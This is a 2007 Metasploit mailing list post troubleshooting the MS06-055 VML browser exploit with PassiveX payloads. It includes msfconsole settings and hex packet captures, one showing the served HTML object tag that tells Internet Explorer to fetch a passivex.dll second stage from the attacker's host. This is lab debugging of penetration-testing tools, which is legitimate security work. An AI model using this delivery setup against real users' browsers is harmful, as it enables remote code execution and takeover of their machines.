Home page logo
/

metasploit logo Metasploit mailing list archives

PassiveX-based payloads and MS06-055
From: buffer at softmedia.info (Angelo Dell'Aera)
Date: Fri, 16 Mar 2007 16:30:50 +0100

Il giorno Wed, 14 Mar 2007 23:03:41 -0700
mmiller at hick.org ha scritto:


Hmm, from these logs it looks like it's working.  'p' is set to a proc
that is defined in passivex.rb, which is correct.  It looks like the
text just line-wrapped.  Since it says 'Sending PassiveX...', that
means that it at least handled the initial request and sent it to the
correct page which contains the object tag.  However, it looks like
the browser didn't attempt to download the control.  Do you happen to
be running this exploit in a non-administrative account?  Internet
explorer won't download ActiveX controls as non-admin.
Alternatively, can you try browsing to the page hosting PX in
Internet Explorer, since it seems like you're getting farther now
than before?


Matt,
something is moving here but we're not still at the end of the game. 
I noticed that the problem while handling the PXURI resource was 
not a real problem but it's worth mentioning. 

While setting the environment variables, the handling is not correctly
done if the / in the PXURI is not properly escaped (and my apologies
for this).

msf exploit(ms06_055_vml_method) > set URIPATH uripath
URIPATH => uripath
msf exploit(ms06_055_vml_method) > set PXURI "/pxuri"
PXURI => /pxuri

Taking a step further there's still no luck in owning the box. Take a
look at this please. This happens in the second stage of the exploit
when the client is trying to getting PXURI.

The browser request...

0x0000:  4500 00f4 0177 4000 8006 3437 c0a8 2183 E....w at ...47..!.
0x0010:  c0a8 2182 042b 1f90 0553 dcd2 7073 2c77  ..!..+...S..ps,w
0x0020:  5018 faf0 1ebe 0000 4745 5420 2f70 7875 P.......GET./pxu
0x0030:  7269 2048 5454 502f 312e 310d 0a41 6363 ri.HTTP/1.1..Acc
0x0040:  6570 743a 202a 2f2a 0d0a 4163 6365 7074 ept:.*/*..Accept
0x0050:  2d4c 616e 6775 6167 653a 2069 740d 0a41 -Language:.it..A
0x0060:  6363 6570 742d 456e 636f 6469 6e67 3a20 ccept-Encoding:.
0x0070:  677a 6970 2c20 6465 666c 6174 650d 0a55 gzip,.deflate..U
0x0080:  7365 722d 4167 656e 743a 204d 6f7a 696c ser-Agent:.Mozil
0x0090:  6c61 2f34 2e30 2028 636f 6d70 6174 6962 la/4.0.(compatib
0x00a0:  6c65 3b20 4d53 4945 2036 2e30 3b20 5769 le;.MSIE.6.0;.Wi
0x00b0:  6e64 6f77 7320 4e54 2035 2e31 290d 0a48 ndows.NT.5.1)..H
0x00c0:  6f73 743a 2031 3932 2e31 3638 2e33 332e ost:.192.168.33.
0x00d0:  3133 303a 3830 3830 0d0a 436f 6e6e 6563 130:8080..Connec
0x00e0:  7469 6f6e 3a20 4b65 6570 2d41 6c69 7665 tion:.Keep-Alive
0x00f0:  0d0a 0d0a                                ....

and Metasploit response...

0x0000:  4500 01e2 71de 4000 4006 02e2 c0a8 2182 E...q. at . ()      ! 
0x0010:  c0a8 2183 1f90 042b 7073 2c77 0553 dd9e  ..!....+ps,w.S..
0x0020:  5018 1920 3b57 0000 4854 5450 2f31 2e31 P...;W..HTTP/1.1
0x0030:  2032 3030 204f 4b0d 0a53 6572 7665 723a  .200.OK..Server:
0x0040:  2041 7061 6368 650d 0a43 6f6e 7465 6e74  .Apache..Content
0x0050:  2d54 7970 653a 2074 6578 742f 6874 6d6c -Type:.text/html
0x0060:  0d0a 436f 6e74 656e 742d 4c65 6e67 7468  ..Content-Length
0x0070:  3a20 3333 370d 0a43 6f6e 6e65 6374 696f  :.337..Connectio
0x0080:  6e3a 204b 6565 702d 416c 6976 650d 0a0d n:.Keep-Alive...
0x0090:  0a3c 6874 6d6c 3e09 3c6f 626a 6563 7420  .<html>.<object.
0x00a0:  636c 6173 7369 643d 2243 4c53 4944 3a42 classid="CLSID:B
0x00b0:  3341 4337 3330 372d 4645 4145 2d34 6534 3AC7307-FEAE-4e4
0x00c0:  332d 4232 4436 2d31 3631 4536 3841 4241 3-B2D6-161E68ABA
0x00d0:  3833 3822 2063 6f64 6562 6173 653d 222f 838 ".codebase="/
0x00e0:  7078 7572 692f 7061 7373 6976 6578 2e64 pxuri/passivex.d
0x00f0:  6c6c 232d 312c 2d31 2c2d 312c 2d31 223e ll#-1,-1,-1,-1">
0x0100:  0909 3c70 6172 616d 206e 616d 653d 2248  ..<param.name="H
0x0110:  7474 7048 6f73 7422 2076 616c 7565 3d22 ttpHost".value="
0x0120:  3139 322e 3136 382e 3333 2e31 3330 223e 192.168.33.130">
0x0130:  0909 3c70 6172 616d 206e 616d 653d 2248  ..<param.name="H
0x0140:  7474 7050 6f72 7422 2076 616c 7565 3d22 ttpPort".value="
0x0150:  3830 3830 223e 0909 3c70 6172 616d 206e 8080">..<param.n
0x0160:  616d 653d 2248 7474 7055 7269 4261 7365 ame="HttpUriBase
0x0170:  2220 7661 6c75 653d 222f 7078 7572 6922 ".value="/pxuri"
0x0180:  3e09 093c 7061 7261 6d20 6e61 6d65 3d22 >..<param.name="
0x0190:  4874 7470 5369 6422 2076 616c 7565 3d22 HttpSid".value="
0x01a0:  3222 3e09 093c 7061 7261 6d20 6e61 6d65 2">..<param.name
0x01b0:  3d22 446f 776e 6c6f 6164 5365 636f 6e64 ="DownloadSecond
0x01c0:  5374 6167 6522 2076 616c 7565 3d22 3122 Stage".value="1"
0x01d0:  3e09 3c2f 6f62 6a65 6374 3e3c 2f68 746d >.</object></htm
0x01e0:  6c3e                                   l>

followed by a FIN/ACK which is then ACKed by the browser. After this
nothing else. Everything seems correct at a first glance but IE doesn't
go on in downloading the ActiveX control.

FYI answering to the question in your reply I'm running this exploit as
Administrator. I even tried disabling any kind of protection against
ActiveX downloading and executing in every Internet Zone but still
nothing.


Regards,

-- 

Angelo Dell'Aera 'buffer' 
Antifork Research, Inc.         http://buffer.antifork.org
Metro Olografix

PGP information in e-mail header


-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 197 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070316/486c8af5/attachment.pgp>


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]